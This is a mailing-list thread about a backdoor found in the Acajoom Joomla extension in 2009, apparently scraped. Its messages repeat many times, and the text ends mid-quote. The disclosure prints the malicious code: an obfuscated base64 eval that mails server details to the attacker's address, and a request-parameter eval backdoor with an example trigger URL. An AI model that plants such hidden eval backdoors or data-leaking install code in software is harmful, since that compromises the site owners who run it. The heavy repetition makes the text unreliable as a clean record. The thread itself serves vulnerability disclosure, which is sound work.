>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
